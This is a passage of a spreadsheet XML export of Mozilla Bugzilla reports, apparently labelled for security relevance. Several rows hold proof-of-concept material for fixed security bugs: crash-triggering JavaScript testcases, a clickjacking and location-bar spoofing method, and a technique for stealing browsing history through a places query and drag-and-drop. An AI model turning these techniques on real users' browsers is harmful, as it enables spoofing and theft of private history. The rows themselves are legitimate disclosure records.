          <t>[post-critsmash-triage][adv-main41+]</t>
        </is>
      </c>
      <c r="Q4555" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4555" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4555" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T4555" t="n">
        <v>1</v>
      </c>
      <c r="U4555" t="n">
        <v>0</v>
      </c>
      <c r="V4555" t="n">
        <v>26</v>
      </c>
      <c r="W4555" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0
Build ID: 20150629114049
Steps to reproduce:
mozilla-central revision 892594bdad30 (build with: --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --enable-debug)
const dbg = new Debugger();
const g = evalcx("lazy");
dbg.addDebuggee(g);
dbg.memory.trackingAllocationSites = true;
g.eval("this.alloc = {}");
Actual results:
Assertion failure: getSlotRef(EVAL).isUndefined(), at js/src/vm/GlobalObject.h:147
Expected results:
undefined or some other relevant message</t>
        </is>
      </c>
      <c r="X4555" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4556">
      <c r="A4556" t="n">
        <v>1421937</v>
      </c>
      <c r="B4556" t="inlineStr">
        <is>
          <t>2017-11-30 01:01:55 -0800</t>
        </is>
      </c>
      <c r="C4556" t="inlineStr">
        <is>
          <t>"Synced Tabs" sidebar's laptop image looks bad with Windows's light gray background color</t>
        </is>
      </c>
      <c r="D4556" t="inlineStr">
        <is>
          <t>2018-02-20 19:48:40 -0800</t>
        </is>
      </c>
      <c r="E4556" t="n">
        <v>1</v>
      </c>
      <c r="F4556" t="n">
        <v>1</v>
      </c>
      <c r="G4556" t="n">
        <v>2</v>
      </c>
      <c r="H4556" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4556" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4556" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K4556" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4556" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4556" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4556" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4556" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4556" t="inlineStr"/>
      <c r="Q4556" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4556" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4556" t="inlineStr">
        <is>
          <t>Firefox 59</t>
        </is>
      </c>
      <c r="T4556" t="n">
        <v>1</v>
      </c>
      <c r="U4556" t="n">
        <v>0</v>
      </c>
      <c r="V4556" t="n">
        <v>15</v>
      </c>
      <c r="W4556" t="inlineStr">
        <is>
          <t>Created attachment 8933229
Synced_Tabs_sidebar_Windows.png
STR:
1. Using Firefox Nightly 59 on Windows 10, open the Synced Tab sidebar (in a new user profile that is not logged into Sync): View menu &gt; Sidebar menu &gt; Synced Tabs.
2. Examine the outline of the Synced Tabs sidebar's laptop image.
RESULT:
On Windows, the Synced Tabs sidebar's background color is light gray, which causes the laptop image's dark gray cloud outlines to look like unintentional rendering artifacts. See the attached screenshots.
This laptop image is new in Nightly 59.</t>
        </is>
      </c>
      <c r="X4556" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4557">
      <c r="A4557" t="n">
        <v>675515</v>
      </c>
      <c r="B4557" t="inlineStr">
        <is>
          <t>2011-07-31 12:37:44 -0700</t>
        </is>
      </c>
      <c r="C4557" t="inlineStr">
        <is>
          <t>Crash [@ TextUpdater::DoUpdate] with long text node</t>
        </is>
      </c>
      <c r="D4557" t="inlineStr">
        <is>
          <t>2012-01-19 11:27:07 -0800</t>
        </is>
      </c>
      <c r="E4557" t="n">
        <v>1</v>
      </c>
      <c r="F4557" t="n">
        <v>1</v>
      </c>
      <c r="G4557" t="n">
        <v>3</v>
      </c>
      <c r="H4557" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4557" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4557" t="inlineStr">
        <is>
          <t>Disability Access APIs</t>
        </is>
      </c>
      <c r="K4557" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4557" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4557" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4557" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4557" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4557" t="inlineStr">
        <is>
          <t>[sg:critical?][qa!]</t>
        </is>
      </c>
      <c r="Q4557" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4557" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4557" t="inlineStr">
        <is>
          <t>mozilla8</t>
        </is>
      </c>
      <c r="T4557" t="n">
        <v>1</v>
      </c>
      <c r="U4557" t="n">
        <v>0</v>
      </c>
      <c r="V4557" t="n">
        <v>46</v>
      </c>
      <c r="W4557" t="inlineStr">
        <is>
          <t>Created attachment 549679
testcase (crashes Firefox debug builds, if accessibility is enabled)
1. Start a debug build of Firefox.
2. Enable accessibility, e.g. by pasting the following into the js console:
Components.classes["@mozilla.org/accessibilityService;1"]
      .getService(Components.interfaces.nsIAccessibleRetrieval);
3. Load the testcase.
Result: Crash [@ TextUpdater::DoUpdate] trying to access e.g. 0x24db0000.</t>
        </is>
      </c>
      <c r="X4557" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4558">
      <c r="A4558" t="n">
        <v>1222798</v>
      </c>
      <c r="B4558" t="inlineStr">
        <is>
          <t>2015-11-08 05:38:05 -0800</t>
        </is>
      </c>
      <c r="C4558" t="inlineStr">
        <is>
          <t>Firefox 43 for Android : Clickjacking / CSRF attacks and Location Bar Spoofing (URL and SSL Spoofing)</t>
        </is>
      </c>
      <c r="D4558" t="inlineStr">
        <is>
          <t>2024-05-30 09:06:52 -0700</t>
        </is>
      </c>
      <c r="E4558" t="n">
        <v>1</v>
      </c>
      <c r="F4558" t="n">
        <v>1</v>
      </c>
      <c r="G4558" t="n">
        <v>6</v>
      </c>
      <c r="H4558" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4558" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J4558" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4558" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4558" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4558" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N4558" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4558" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4558" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main51+]</t>
        </is>
      </c>
      <c r="Q4558" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4558" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4558" t="inlineStr">
        <is>
          <t>Firefox 51</t>
        </is>
      </c>
      <c r="T4558" t="n">
        <v>1</v>
      </c>
      <c r="U4558" t="n">
        <v>0</v>
      </c>
      <c r="V4558" t="n">
        <v>39</v>
      </c>
      <c r="W4558" t="inlineStr">
        <is>
          <t>Created attachment 8684653
Screenshot of the vulnerability.png
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0
Build ID: 20151029151421
Steps to reproduce:
With Firefox 42 for Android , it's possible to make Clickjacking /CSRF attacks and possible URL and SSL Spoofing.
Step1 : go to https://www.alternativ-testing.fr/Research/Mozilla/android/android-Firefox42.0-Clickjacking-CSRF-URL-and-SSL%20Spoofing/testfs.html and click on the step1 link.
Step2 : click on the step2 Link. 
step3 : an alert() JavaScript Function will be used for redirect the user on the tab opened by the first link (step1 link) and the location bar will appears like a secure webpage and show "https://mobile.twitter.com/session/new" but the visible content of the webpage is the content of "https://www.alternativ-testing.fr/Research/Mozilla/android/android-Firefox42.0-Clickjacking-CSRF-URL-and-SSL%20Spoofing/testfs.html" if your login and password for mobile.twitter.com is registred , by clicking on the button "ClickJack-twitter-login" you will be connected on your twitter account ( i will uploaded you a video and a screenshot for show you what this vulnerability is exactly)
Actual results:
An attacker can use this vulnerability for make clickjacking /CSRF attacks and possibly URL ans SSL Spoofing.
Expected results:
The visible content of the webpage is wrong and the real content of the URL showed is invisible and this can lead to ClickJacking and Cross-Site Request Forgery and also possible URL ans SSL Spoofing.</t>
        </is>
      </c>
      <c r="X4558" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4559">
      <c r="A4559" t="n">
        <v>1172937</v>
      </c>
      <c r="B4559" t="inlineStr">
        <is>
          <t>2015-06-09 06:44:33 -0700</t>
        </is>
      </c>
      <c r="C4559" t="inlineStr">
        <is>
          <t>Action row doesn't always update correctly with unified autocomplete</t>
        </is>
      </c>
      <c r="D4559" t="inlineStr">
        <is>
          <t>2015-08-10 05:28:24 -0700</t>
        </is>
      </c>
      <c r="E4559" t="n">
        <v>1</v>
      </c>
      <c r="F4559" t="n">
        <v>1</v>
      </c>
      <c r="G4559" t="n">
        <v>2</v>
      </c>
      <c r="H4559" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4559" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4559" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K4559" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4559" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4559" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4559" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4559" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4559" t="inlineStr">
        <is>
          <t>[unifiedautocomplete][fxsearch]</t>
        </is>
      </c>
      <c r="Q4559" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4559" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4559" t="inlineStr">
        <is>
          <t>Firefox 42</t>
        </is>
      </c>
      <c r="T4559" t="n">
        <v>1</v>
      </c>
      <c r="U4559" t="n">
        <v>0</v>
      </c>
      <c r="V4559" t="n">
        <v>36</v>
      </c>
      <c r="W4559" t="inlineStr">
        <is>
          <t>STR:
- navigate to google.com so that it's in your history
- open a new tab
- type »goo« into the awesomebar (should autocomplete to google.com)
- press backspace so that the location bar content only says »goo«
Expected result:
- Action row should say »goo - Search with Yahoo«
- Pressing enter should search for »goo«
Actual result:
- Action row still says »Visit google.com«
- Pressing enter does nothing
- Typing any other character after pressing enter searches for the wrong term</t>
        </is>
      </c>
      <c r="X4559" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4560">
      <c r="A4560" t="n">
        <v>1192957</v>
      </c>
      <c r="B4560" t="inlineStr">
        <is>
          <t>2015-08-10 11:46:14 -0700</t>
        </is>
      </c>
      <c r="C4560" t="inlineStr">
        <is>
          <t>Add isort to the Travis run to prevent regressing Python import style</t>
        </is>
      </c>
      <c r="D4560" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E4560" t="n">
        <v>1</v>
      </c>
      <c r="F4560" t="n">
        <v>1</v>
      </c>
      <c r="G4560" t="n">
        <v>7</v>
      </c>
      <c r="H4560" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4560" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4560" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K4560" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4560" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4560" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4560" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4560" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4560" t="inlineStr"/>
      <c r="Q4560" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R4560" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4560" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4560" t="n">
        <v>1</v>
      </c>
      <c r="U4560" t="n">
        <v>0</v>
      </c>
      <c r="V4560" t="n">
        <v>12</v>
      </c>
      <c r="W4560" t="inlineStr">
        <is>
          <t>Bug 1192661 cleaned up the Python imports.
We could run `isort --check-only` as part of the Travis run to avoid this regressing.
I've filed a few upstream issues which would likely need to be fixed first:
https://github.com/timothycrosley/isort/issues/298
https://github.com/timothycrosley/isort/issues/296
https://github.com/timothycrosley/isort/issues/297
Plus we'll also need to:
* Check we can't get flake8 to do this for us
* See what the impact is on the travis run time (running it inside my Vagrant VM takes 45s, but that's likely due to Virtualbox shared folders being slow - and I can't run it outside the VM since the python packages have to be installed for isort to be able to figure out whether a reference is first or third party)</t>
        </is>
      </c>
      <c r="X4560" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4561">
      <c r="A4561" t="n">
        <v>639648</v>
      </c>
      <c r="B4561" t="inlineStr">
        <is>
          <t>2011-03-07 15:35:47 -0800</t>
        </is>
      </c>
      <c r="C4561" t="inlineStr">
        <is>
          <t>crash due to stack exhaustion in BindToTree with setUserData</t>
        </is>
      </c>
      <c r="D4561" t="inlineStr">
        <is>
          <t>2011-07-12 08:31:38 -0700</t>
        </is>
      </c>
      <c r="E4561" t="n">
        <v>1</v>
      </c>
      <c r="F4561" t="n">
        <v>1</v>
      </c>
      <c r="G4561" t="n">
        <v>3</v>
      </c>
      <c r="H4561" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4561" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4561" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4561" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4561" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4561" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4561" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4561" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4561" t="inlineStr">
        <is>
          <t>[sg:critical?] fixed on m-c by 650493</t>
        </is>
      </c>
      <c r="Q4561" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4561" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4561" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4561" t="n">
        <v>1</v>
      </c>
      <c r="U4561" t="n">
        <v>0</v>
      </c>
      <c r="V4561" t="n">
        <v>24</v>
      </c>
      <c r="W4561" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.14) Gecko/20110221 Ubuntu/10.10 (maverick) Firefox/3.6.14
Build Identifier: 
following javascript in a HTML document will crash the browser:
tmp = document.createElement('iframe');
document.body.appendChild(tmp);
o52=document.createElement('h1');
o62=tmp.contentDocument.createElement('script');
o136=o52.setUserData('key',o62,function (o,k,d,s,ds) { o52.appendChild(d); });
o62.appendChild(o52);
Linux GDB stack backtrace:
(gdb) bt 10
#0  nsStyledElement::BindToTree (this=0x7fffd1463900, aDocument=0x0, 
    aParent=0x7fffd1494e40, aBindingParent=0x0, aCompileEventHandlers=1)
    at nsStyledElement.cpp:157
#1  0x00007ffff6c5287b in nsMappedAttributeElement::BindToTree (
    this=0x7fffd1463900, aDocument=0x0, aParent=0x7fffd1494e40, 
    aBindingParent=0x0, aCompileEventHandlers=1)
    at nsMappedAttributeElement.cpp:51
#2  0x00007ffff6ca4907 in nsGenericHTMLElement::BindToTree (
    this=0x7fffd1463900, aDocument=0x0, aParent=0x7fffd1494e40, 
    aBindingParent=0x0, aCompileEventHandlers=1)
    at nsGenericHTMLElement.cpp:869
#3  0x00007ffff6c4abb6 in nsGenericElement::BindToTree (this=0x7fffd1494e40, 
    aDocument=0x0, aParent=&lt;value optimized out&gt;, aBindingParent=0x0, 
    aCompileEventHandlers=&lt;value optimized out&gt;) at nsGenericElement.cpp:2657
#4  0x00007ffff6c66266 in nsStyledElement::BindToTree (this=0x7fffd1463900, 
    aDocument=0x0, aParent=0x7fffd1494e40, aBindingParent=0x0, 
    aCompileEventHandlers=1) at nsStyledElement.cpp:157
#5  0x00007ffff6c5287b in nsMappedAttributeElement::BindToTree (
    this=0x7fffd1463900, aDocument=0x0, aParent=0x7fffd1494e40, 
    aBindingParent=0x0, aCompileEventHandlers=1)
    at nsMappedAttributeElement.cpp:51
#6  0x00007ffff6ca4907 in nsGenericHTMLElement::BindToTree (
    this=0x7fffd1463900, aDocument=0x0, aParent=0x7fffd1494e40, 
Tested on FF4 beta and FF3 on Windows and Linux
Reproducible: Always</t>
        </is>
      </c>
      <c r="X4561" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4562">
      <c r="A4562" t="n">
        <v>109679</v>
      </c>
      <c r="B4562" t="inlineStr">
        <is>
          <t>2001-11-11 18:04:36 -0800</t>
        </is>
      </c>
      <c r="C4562" t="inlineStr">
        <is>
          <t>[security] fieldx-x-x values not validated</t>
        </is>
      </c>
      <c r="D4562" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:27 -0800</t>
        </is>
      </c>
      <c r="E4562" t="n">
        <v>1</v>
      </c>
      <c r="F4562" t="n">
        <v>1</v>
      </c>
      <c r="G4562" t="n">
        <v>4</v>
      </c>
      <c r="H4562" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4562" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4562" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K4562" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L4562" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4562" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4562" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4562" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4562" t="inlineStr">
        <is>
          <t>included in 2.14.1</t>
        </is>
      </c>
      <c r="Q4562" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4562" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4562" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T4562" t="n">
        <v>1</v>
      </c>
      <c r="U4562" t="n">
        <v>0</v>
      </c>
      <c r="V4562" t="n">
        <v>35</v>
      </c>
      <c r="W4562" t="inlineStr">
        <is>
          <t>I found this while enabling taint mode.
The above url will show you the summary of the test security group bug on bmo.
Not sure how to fix this - we can't sqlquote it, because its a field name. Maybe
check for a lack of spaces?</t>
        </is>
      </c>
      <c r="X4562" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4563">
      <c r="A4563" t="n">
        <v>1543191</v>
      </c>
      <c r="B4563" t="inlineStr">
        <is>
          <t>2019-04-09 10:33:45 -0700</t>
        </is>
      </c>
      <c r="C4563" t="inlineStr">
        <is>
          <t>Stealing history data using places querying and drag and drop</t>
        </is>
      </c>
      <c r="D4563" t="inlineStr">
        <is>
          <t>2024-05-30 09:58:11 -0700</t>
        </is>
      </c>
      <c r="E4563" t="n">
        <v>1</v>
      </c>
      <c r="F4563" t="n">
        <v>1</v>
      </c>
      <c r="G4563" t="n">
        <v>2</v>
      </c>
      <c r="H4563" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4563" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4563" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K4563" t="inlineStr">
        <is>
          <t>68 Branch</t>
        </is>
      </c>
      <c r="L4563" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4563" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4563" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4563" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4563" t="inlineStr">
        <is>
          <t>[adv-main67+][adv-esr60.7+]</t>
        </is>
      </c>
      <c r="Q4563" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4563" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4563" t="inlineStr">
        <is>
          <t>Firefox 68</t>
        </is>
      </c>
      <c r="T4563" t="n">
        <v>1</v>
      </c>
      <c r="U4563" t="n">
        <v>0</v>
      </c>
      <c r="V4563" t="n">
        <v>25</v>
      </c>
      <c r="W4563" t="inlineStr">
        <is>
          <t>Created attachment 9057015
poc.htm
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Steps to reproduce:
Using attached PoC:
1. If you don't have bookmarks bar open then open sidebar bookmark page by pressing CTRL+B
2. Drag and drop the anchor tag into the bookmark bar/sidebar 
3. Now drag and drop the newly created bookmark into the webpages body
Actual results:
For some reason the dragged object from the bookmark bar contains 'text/html' formatted data of all the queried history entries. Which means we can steal users history data (even loaded iframes) with precision, thanks to the use of the places query.
Step [2] creates a places query ( https://developer.mozilla.org/en-US/docs/Mozilla/Tech/Places/Places_query_URIs ) that looks like:
place:type=0&amp;sort=1&amp;terms=token&amp;maxResults=10&amp;includeHidden=true
I am looking within the users history for any entry with the term 'token' in the URL, for testing purposes I only grab 10 entries but this could be increased in an attack scenario. I also use the 'includeHidden' query operator to include otherwise hidden history entries that come from iframes and images, just to further expand my net.
Step [3] is where I think the bug exists. Once we drag the newly created places query bookmark back into our webpage, we can read all the results from our query by reading the 'text/html' data entry. 
Expected results:
There should not be a ''text/html' readable data when drag and dropping bookmarks from firefox and to firefox. I believe this may have been put there for cross application compatibility but is of no use (AFAIK) when it comes to drag and dropping within firefox.</t>
        </is>
      </c>
      <c r="X4563" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4564">
      <c r="A4564" t="n">
        <v>1191942</v>
      </c>
      <c r="B4564" t="inlineStr">
        <is>
          <t>2015-08-06 11:49:24 -0700</t>
        </is>
      </c>
      <c r="C4564" t="inlineStr">
        <is>
          <t>crash in nsCOMPtr&lt;T&gt;::nsCOMPtr&lt;T&gt;(nsIVariant*) | nsTArray_Impl&lt;T&gt;::AppendElement&lt;T&gt;(nsIDocument*&amp;)</t>
        </is>
      </c>
      <c r="D4564" t="inlineStr">
        <is>
          <t>2016-07-02 11:19:05 -0700</t>
        </is>
      </c>
      <c r="E4564" t="n">
        <v>1</v>
      </c>
      <c r="F4564" t="n">
        <v>1</v>
      </c>
      <c r="G4564" t="n">
        <v>3</v>
      </c>
      <c r="H4564" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4564" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4564" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K4564" t="inlineStr">
        <is>
          <t>42 Branch</t>
        </is>
      </c>
      <c r="L4564" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4564" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N4564" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4564" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4564" t="inlineStr">
        <is>
          <t>[adv-main42+][adv-esr38.4+]</t>
        </is>
      </c>
      <c r="Q4564" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4564" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4564" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T4564" t="n">
        <v>1</v>
      </c>
      <c r="U4564" t="n">
        <v>0</v>
      </c>
      <c r="V4564" t="n">
        <v>36</v>
      </c>
      <c r="W4564" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-a2ad264a-47f7-41fc-8c09-e6db22150803.
=============================================================
The signature changes a lot thanks to COMDAT folding, but as far as I can tell this stack with the refresh driver is seen on all current trains.
A good number of these are at address 0x5a5a5a5e, and another chunk are at 0x4 -- either way it's an AddRef through a busted vtable. At first glance it looks like one of these FrameRequestCallbacks has been freed.
Frame 	Module 	Signature 	Source
0 	xul.dll 	nsCOMPtr&lt;nsIVariant&gt;::nsCOMPtr&lt;nsIVariant&gt;(nsIVariant*) 	xpcom/glue/nsCOMPtr.h
1 	xul.dll 	nsTArray_Impl&lt;DocumentFrameCallbacks, nsTArrayInfallibleAllocator&gt;::AppendElement&lt;nsIDocument*&amp;&gt;(nsIDocument*&amp;) 	xpcom/glue/nsTArray.h
2 	xul.dll 	TakeFrameRequestCallbacksFrom 	layout/base/nsRefreshDriver.cpp
3 	xul.dll 	nsRefreshDriver::RunFrameRequestCallbacks(__int64, mozilla::TimeStamp) 	layout/base/nsRefreshDriver.cpp
4 	xul.dll 	nsRefreshDriver::Tick(__int64, mozilla::TimeStamp) 	layout/base/nsRefreshDriver.cpp
5 	xul.dll 	mozilla::RefreshDriverTimer::TickDriver(nsRefreshDriver*, __int64, mozilla::TimeStamp) 	layout/base/nsRefreshDriver.cpp
6 	xul.dll 	mozilla::InactiveRefreshDriverTimer::TickOne() 	layout/base/nsRefreshDriver.cpp
7 	xul.dll 	mozilla::InactiveRefreshDriverTimer::TimerTickOne(nsITimer*, void*) 	layout/base/nsRefreshDriver.cpp</t>
        </is>
      </c>
      <c r="X4564" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4565">
      <c r="A4565" t="n">
        <v>1476941</v>
      </c>
      <c r="B4565" t="inlineStr">
        <is>
          <t>2018-07-19 06:51:30 -0700</t>
        </is>
      </c>
      <c r="C4565" t="inlineStr">
        <is>
          <t>fix product throttling in antenna</t>
        </is>
      </c>
      <c r="D4565" t="inlineStr">
        <is>
          <t>2018-08-15 09:52:39 -0700</t>
        </is>
      </c>
      <c r="E4565" t="n">
        <v>1</v>
      </c>
      <c r="F4565" t="n">
        <v>1</v>
      </c>
      <c r="G4565" t="n">
        <v>4</v>
      </c>
      <c r="H4565" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4565" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4565" t="inlineStr">
        <is>
          <t>Antenna</t>
        </is>
      </c>
      <c r="K4565" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4565" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4565" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4565" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4565" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4565" t="inlineStr"/>
      <c r="Q4565" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4565" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4565" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4565" t="n">
        <v>1</v>
      </c>
      <c r="U4565" t="n">
        <v>0</v>
      </c>
      <c r="V4565" t="n">
        <v>17</v>
      </c>
      <c r="W4565" t="inlineStr">
        <is>
          <t>Antenna currently has a quixotic set of throttling rules for determining what to reject, what to defer, and what to accept. Several of the rules intersect in a hard-to-predict way around the product the crash report is for.
For example, we accept all crash reports that have a comment--regardless of the product. But we will defer (i.e. not process) crash reports unless they're firefox, fennec, or start with T, S, or C. That's weird.
This bug covers fixing that so we're rejecting crashes for products we don't want to be accepting crashes from so they're not sliding through.</t>
        </is>
      </c>
      <c r="X4565" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4566">
      <c r="A4566" t="n">
        <v>1408985</v>
      </c>
      <c r="B4566" t="inlineStr">
        <is>
          <t>2017-10-16 04:44:41 -0700</t>
        </is>
      </c>
      <c r="C4566" t="inlineStr">
        <is>
